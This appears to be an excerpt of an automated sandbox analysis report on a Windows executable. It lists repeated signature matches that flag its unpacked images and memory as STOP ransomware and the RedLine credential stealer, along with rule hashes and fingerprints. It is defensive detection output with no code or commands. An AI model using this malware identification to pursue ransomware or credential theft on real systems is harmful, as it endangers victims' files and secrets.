          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: String function: 00428C81 appears 37 times
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: String function: 023B8EC0 appears 57 times
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: String function: 023C0160 appears 50 times
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: String function: 004547A0 appears 33 times
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: String function: 0042F7C0 appears 75 times
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: String function: 0044F23E appears 55 times
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: String function: 00428520 appears 67 times
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: String function: 00454E50 appears 36 times
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: String function: 00428C81 appears 42 times
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: String function: 02410160 appears 50 times
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: String function: 004547A0 appears 75 times
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: String function: 02390160 appears 50 times
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: String function: 0042F7C0 appears 99 times
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: String function: 0044F23E appears 53 times
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: String function: 00428520 appears 77 times
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: String function: 02408EC0 appears 57 times
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: String function: 00454E50 appears 42 times
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: String function: 02388EC0 appears 57 times
          Source: 66d5df681876c_file010924.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: 33.2.66d5df681876c_file010924.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 33.2.66d5df681876c_file010924.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 2.2.66d5df681876c_file010924.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 2.2.66d5df681876c_file010924.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 29.2.66d5df681876c_file010924.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 29.2.66d5df681876c_file010924.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 20.2.66d5df681876c_file010924.exe.23615a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 20.2.66d5df681876c_file010924.exe.23615a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 0.2.66d5df681876c_file010924.exe.23615a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 0.2.66d5df681876c_file010924.exe.23615a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 12.2.66d5df681876c_file010924.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 12.2.66d5df681876c_file010924.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 25.2.66d5df681876c_file010924.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 25.2.66d5df681876c_file010924.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 28.2.66d5df681876c_file010924.exe.23215a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 28.2.66d5df681876c_file010924.exe.23215a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 20.2.66d5df681876c_file010924.exe.23615a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 20.2.66d5df681876c_file010924.exe.23615a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 6.2.66d5df681876c_file010924.exe.23915a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 6.2.66d5df681876c_file010924.exe.23915a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 6.2.66d5df681876c_file010924.exe.23915a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 6.2.66d5df681876c_file010924.exe.23915a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 21.2.66d5df681876c_file010924.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 21.2.66d5df681876c_file010924.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 12.2.66d5df681876c_file010924.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 12.2.66d5df681876c_file010924.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 2.2.66d5df681876c_file010924.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 2.2.66d5df681876c_file010924.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 29.2.66d5df681876c_file010924.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 29.2.66d5df681876c_file010924.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 32.2.66d5df681876c_file010924.exe.23d15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 32.2.66d5df681876c_file010924.exe.23d15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 25.2.66d5df681876c_file010924.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 25.2.66d5df681876c_file010924.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 28.2.66d5df681876c_file010924.exe.23215a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 28.2.66d5df681876c_file010924.exe.23215a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 24.2.66d5df681876c_file010924.exe.23815a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 24.2.66d5df681876c_file010924.exe.23815a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 5.2.66d5df681876c_file010924.exe.23e15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 5.2.66d5df681876c_file010924.exe.23e15a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 32.2.66d5df681876c_file010924.exe.23d15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 32.2.66d5df681876c_file010924.exe.23d15a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 33.2.66d5df681876c_file010924.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 33.2.66d5df681876c_file010924.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 5.2.66d5df681876c_file010924.exe.23e15a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 5.2.66d5df681876c_file010924.exe.23e15a0.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 0.2.66d5df681876c_file010924.exe.23615a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 0.2.66d5df681876c_file010924.exe.23615a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 24.2.66d5df681876c_file010924.exe.23815a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 24.2.66d5df681876c_file010924.exe.23815a0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 21.2.66d5df681876c_file010924.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 21.2.66d5df681876c_file010924.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 00000020.00000002.2444319207.0000000002332000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 0000001C.00000002.1624704973.000000000228E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 00000018.00000002.1506583704.0000000002380000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000020.00000002.2444379499.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000006.00000002.1282127310.00000000022FE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 0000001C.00000002.1624809590.0000000002320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000019.00000002.1522339744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 00000019.00000002.1522339744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
          Source: 00000000.00000002.1232942398.00000000022C9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
          Source: 0000001D.00000002.1635910279.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
          Source: 0000001D.00000002.1635910279.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
